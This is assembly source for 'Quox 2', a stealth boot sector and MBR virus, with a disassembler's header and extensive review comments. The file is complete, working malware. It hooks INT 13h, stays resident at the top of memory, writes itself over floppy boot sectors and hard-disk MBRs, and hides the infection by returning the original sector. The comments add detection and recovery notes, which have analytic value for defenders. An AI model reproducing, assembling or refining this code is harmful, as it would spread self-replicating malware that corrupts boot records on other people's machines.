comment %
Title : Quox 2
Type : Stealth, Boot + MBR infector
Assembler : Use A86 to create a .BIN bootsector image.
Disass : Dark Fiber [NuKE]
Comments : This is a *FIXED* version of Quox, I fixed the code
coz I think someone purposely fucked with the copy I had.
This version will correctly check to see if its already in
memory, it will also infect hard disks whenever the mbr is
accessed instead of just on booting up from an infected
disk or whatever the original did.
Its 95% in its original state.
%
Dos_Media_Descriptor equ 015h ;offset of the BPB media-descriptor byte inside a boot sector
org 0 ;flat 512-byte sector image; the resident copy executes at offset 0 of its own segment (see Install_Memory)
;this code is used as its infection marker.
;The first Infection_Marker_Len bytes (through the jmp below) are what Install_Memory
;compares in memory and what Grab_Boot compares on disk. The same fixed byte sequence
;is therefore also a usable scanner signature for this variant.
start:
cli
xor ax,ax
mov ss,ax
mov sp,7C00h ;set stack below code (the image is loaded at 0:7C00h by the BIOS)
sti
jmp short Install_Memory
Infection_Marker_Len equ $ - Start ;'Start' vs 'start': assumes case-insensitive label lookup in A86 - confirm
;floppy boot block area, 02Ch bytes long (the BIOS Parameter Block that follows the jump).
;The "instructions" below are a disassembler's rendering of BPB data bytes, not code.
;Infect_Disk copies the target disk's own BPB over this region before writing the
;infected sector, presumably so the disk remains readable by DOS.
;NOTE(review): the items listed here seem to add up to fewer than 02Ch bytes;
;Boot_Block_Len is taken from $, so the assembler's count is what applies.
Boot_Block:
add [bp+si],al
add al,[bx+di]
add [bp+si],al
jo $+2
mov al,ds:[0f905h]
add ax,[bx+si]
or [bx+si],ax
add al,[bx+si]
db 10 dup (0)
db 29h,0F3h ;29h looks like the FAT extended boot signature byte - field layout after it not confirmed
db 8, 'X[_QUOX_ ' ;plain-text name string; a searchable indicator when triaging suspect boot sectors
db 0
Boot_Block_Len equ $ - Boot_Block
;Install_Memory - runs once at boot from 0:7C00h with ax = 0 (set in start).
;Saves the BIOS INT 13h vector, reserves 1 KB at the top of conventional memory
;(unless the marker is already found there), points INT 13h at Int_13_Handler in
;that segment, copies the 512-byte image up, and far-returns into the copy.
;Detection notes: afterwards the word at 0:0413h (BIOS base-memory size in KB) is
;one less than the machine's real figure, and the INT 13h vector's segment points
;just below that top-of-memory boundary rather than into the BIOS or DOS.
Install_Memory:
cld
mov ds,ax ;ds = 0 (ax is still 0 from start)
mov si,013h * 4 ;int 13 vect offset (IVT entry at 0:004Ch)
push cs
pop es
mov di,07c00h + offset Old_Int_13 ;destination inside the image loaded at 7C00h
movsw
movsw ;4-byte far vector -> Old_Int_13
;This memory check routine is fucked.
;it checks the wrong part in memory when it looks for itself.
mov ax,[0413h] ;get amount o mem in kb
mov dx,ax
mov cl,6
shl ax,cl ;convert to paras (KB * 64)
mov si,07C00h
mov di,1024 ;offset compared inside the top-of-memory segment (see the author's note above)
mov es,ax
mov cx,Infection_Marker_Len ;is virus in TOM
repe cmpsb ;ZF=1 if the marker bytes match
jz Already_In_Memory ;ax still holds the computed segment in that case
sub ax,1024/16 ;sub 1 kb from paras (64 paragraphs)
dec word ptr [0413h] ;sub 1 kb from total - BIOS now reports 1 KB less base memory
Already_In_Memory:
cli
mov word ptr [04ch],offset Int_13_Handler ;IVT entry 13h, offset word
mov [04eh],ax ;set new Int 13h (segment word = top-of-memory segment)
sti
mov es,ax
xor di,di ;image is copied to TOM:0000
mov si,07c00h
mov cx,256 ;copy virus to TOM (256 words = 512 bytes)
rep movsw
mov ax,offset Jump_2_Himem ;Jump up to TOM
push es
push ax
retf ;far return = jump to TOM:Jump_2_Himem
;Jump_2_Himem - first code executed in the resident copy (cs = top-of-memory segment).
;Resets the drive, reads the original boot sector/MBR from the location recorded in
;_Sector_Locn/_Drive/_Head into 0:7C00h through the saved BIOS vector, then far-jumps
;there so the machine boots as usual. A failed read is retried indefinitely.
Jump_2_Himem:
push cs
pop ds
mov si,offset _Sector_Locn ;Reset disk system
mov ah,0
mov dl,[si+2] ;dl = _Drive
int 13h ;goes through the new vector, but ah=0 is passed straight to the BIOS by Int_13_Handler
xor ax,ax
mov es,ax
mov bx,7C00h ;es:bx = 0:7C00h, the normal boot-sector load address
mov ax,201h ;read one sector
mov cx,[si] ;cylinder/sector word from _Sector_Locn
mov dx,[si+2] ;_Drive (dl) and _Head (dh)
call Sim_Int_13 ;read in original
jc Jump_2_Himem ;boot sector\mbr - loop until the read succeeds
db 0eaH ;jmp 0:7c00h (far jump, hand-encoded)
dw 07c00h ;jump into old boot
dw ? ;code - segment word; relies on the assembler emitting 0 for '?' - confirm for A86
;Int_13_Handler - resident INT 13h hook (entered with cs = top-of-memory segment).
;Only sector reads (ah=2) and writes (ah=3) aimed at cylinder 0 / sector 1 of a
;drive accepted by Check_Type are examined; anything else goes straight to the
;saved BIOS vector. An accepted request is performed first, then the boot sector
;is re-read into cs:0200h: without the marker it is infected; with the marker the
;caller is handed the saved original sector instead (read stealth).
;Consequence for responders: sector inspection done while this hook is live shows
;a clean boot sector; inspect from known-clean boot media instead.
Int_13_Handler:
cmp ah,2 ;read?
je Try_Infection
cmp ah,3 ;write?
je Try_Infection
Run_Int_13:
jmp dword ptr cs:[Old_Int_13] ;run old int13 (tail jump; the caller's INT frame is reused)
Try_Infection:
call Check_Type ;is it a good disk? (ZF=1 = accepted)
jnz Run_Int_13
cmp cx,1 ;from first sector? (cylinder 0, sector 1 = boot sector / MBR)
jne Run_Int_13
push ds
push es
pusha
call Sim_Int_13 ;run function - the caller's real request is carried out first
pushf ;keep the BIOS result flags (CF) for the caller
push cs
pop ds
call Grab_Boot ;get boot\mbr sector into cs:0200h and compare the marker
jc No_Infection ;could not read it
jz Stealth_Read ;stealth read - marker present, sector already infected
call Infect_Disk ;infect it
call Clean_Buffer ;clean memory - wipe the 512-byte work buffer
No_Infection:
popf ;flags of the caller's own request
popa
pop es
pop ds
retf 2 ;back to the interrupted caller, discarding the flags word INT pushed
Stealth_Read:
popf
popa
mov ax,0201h ;request becomes a 1-sector read of the saved original
mov cx,[512 + _Sector_Locn] ;location fields taken from the infected sector just read
mov dx,[512 + _Drive]
pop es
pop ds ;caller's es:bx is restored by popa/pop es, so the original lands in its buffer
jmp short Run_Int_13 ;BIOS handler performs it and returns to the caller
;Sim_Int_13 - invoke the saved BIOS INT 13h vector as if by 'int 13h':
;flags are pushed so the handler's iret balances. Register and flag results
;(including CF) come back to the caller unchanged. Bypasses this hook.
Sim_Int_13:
pushf
call dword ptr cs:[Old_Int_13]
ret
;Check_Type - decide whether the drive/head in dx is of interest.
;Returns ZF=1 (accept) or ZF=0 (reject); ax is preserved.
;As written: dh must be 0; any dl >= 1 is accepted by the unsigned jae; dl = 0
;then never equals the 080 operand (hex 80h if A86 reads a leading zero as hex,
;decimal 80 otherwise - confirm) and is rejected. Intent not clear from here.
Check_Type:
or dh,dh ;head must be 0
jnz Bad_Type
cmp dl,1
jae Good_Type
cmp dl,080
jne Bad_Type
Good_Type:
push ax
xor ax,ax ;sets ZF=1 ...
pop ax ;... without changing ax (pop does not alter flags)
Bad_Type:
ret ;on the reject path ZF=0 is left over from the failed or/cmp above
;Clean_Buffer - zero the 512-byte sector buffer at cs:0200h.
;General registers preserved (pusha/popa); es is left pointing at cs.
Clean_Buffer:
pusha
push cs
pop es
xor ax,ax
mov cx,256 ;256 words = 512 bytes
mov di,512
rep stosw
popa
ret
;Grab_Boot - read the sector addressed by cx/dx (the intercepted request) into
;cs:0200h, trying at most twice, and compare its first Infection_Marker_Len bytes
;with the resident image at cs:0000.
;Returns CF=1 if both reads failed; otherwise ZF=1 when the marker matches
;(sector already infected), ZF=0 when it does not. Note that repe cmpsb also
;writes CF, so on the compare path CF reflects the last byte compared, not the read.
;Clobbers ax, bx, cx, si, di, es; expects ds = cs (set by the caller).
Grab_Boot:
mov di,2 ;retry counter
Read_Sector:
push cs
pop es
mov bx,200h ;es:bx = cs:0200h work buffer
mov ax,201h ;read one sector
call Sim_Int_13
jnc Check_For_Infection
dec di
jnz Read_Sector
stc ;two failures: report CF=1
ret
Check_For_Infection:
xor si,si ;ds:si = resident image
;** mov di,bx
db 08bh, 0fbh ;hand-encoded 'mov di,bx' (es:di = buffer); why the mnemonic was avoided is not recorded
mov cx,Infection_Marker_Len
repe cmpsb ;ZF=1 => marker found in the sector just read
ret
;Infect_Disk - called with the freshly read, unmarked boot sector/MBR in cs:0200h
;and cx/dx still holding the intercepted request's cylinder/sector/head/drive.
;1. Chooses a location for the original sector, records it in _Sector_Locn/_Drive/
;   _Head of the resident image, and writes the original there.
;2. Copies the target's BPB area and 64-byte partition-table area into the
;   resident image so the infected sector keeps them.
;3. Writes the resident image (cs:0000) over cylinder 0 / sector 1 of the drive.
;Does nothing if the media byte is 0F6h or if the first write fails.
;Recovery note: the _Sector_Locn/_Drive/_Head fields inside an infected sector
;record where its original was written, which is what a cleanup tool needs.
Infect_Disk:
push cs
pop es
mov di,offset _Sector_Locn
mov si,512 + Dos_Media_Descriptor ;si -> media-descriptor byte of the sector read
cmp byte ptr [si],0F6h ;? maybe 2.88 media?
je End_Infect_Code
mov ax,301h ;write one sector
mov bx,200h ;from the buffer holding the original sector
mov dh,1 ;head 1
mov cl,[si+3] ;sectors per track (BPB word at 018h, low byte) = last sector of the track
mov ch,4Fh ;set for 80 tracks (cylinder 79)
cmp byte ptr [si],0FDh ;1.2mb - 0FDh is normally the 360 KB (40-track) media byte, which fits the setting below; the wording looks off
jne Is_Hard_Disk
mov ch,27h ;set for 40tracks (cylinder 39)
Is_Hard_Disk:
cmp dl,80h
jne Not_Hard_Disk
mov cx,w[512 + _Partition + 8] ;starting sector # - low word of the first entry's start field used as cx as-is ('w' taken as A86's word-size operator)
xor dh,dh ;realative to beg o hd
Not_Hard_Disk:
mov [di],cx ;record where the original now lives: _Sector_Locn
mov [di+2],dx ;_Drive / _Head
call Sim_Int_13 ;write the original sector to that location
jc End_Infect_Code
mov cx,Boot_Block_Len
mov di,Boot_Block
mov si,512 + Boot_Block
rep movsb ;take over the target's BPB
mov di,offset _Partition
mov si,512 + _Partition
mov cx,20h
rep movsw ;take over the partition-table area (20h words = 64 bytes)
inc cx ;cx = 1: cylinder 0, sector 1
xor bx,bx ;es:bx = cs:0000, the resident image
mov ax,301h ;write one sector
xor dh,dh ;head 0 (dl assumed to still hold the drive number)
call Sim_Int_13
End_Infect_Code:
ret
;Resident data area. These fields sit inside the 512-byte sector image and so are
;also present, at the same offsets, in every infected boot sector/MBR; that is how
;Stealth_Read and Infect_Disk find them at 512 + offset inside the read buffer.
Old_Int_13: dd ? ;saved original INT 13h far vector (filled by Install_Memory)
db 30 dup (0) ;??? Filler?
_Sector_Locn: db 09, 04fh ;cx for the saved original sector: sector 9, cylinder 4Fh (79) by default
_Drive: db 0h ;dl
_Head: db 01h ;dh
db 10 dup (0) ;??? More Filler?
_Partition db 64 dup (0) ;copy of the target's partition table; presumably padded to sit at the MBR's table offset - not verifiable from this listing
Bootstrap_BIOS_Marker:
db 55h,0AAh ;boot signature, expected as the last two bytes of the 512-byte image
seg_a ends ;NOTE(review): no matching 'seg_a segment' appears in this listing
end start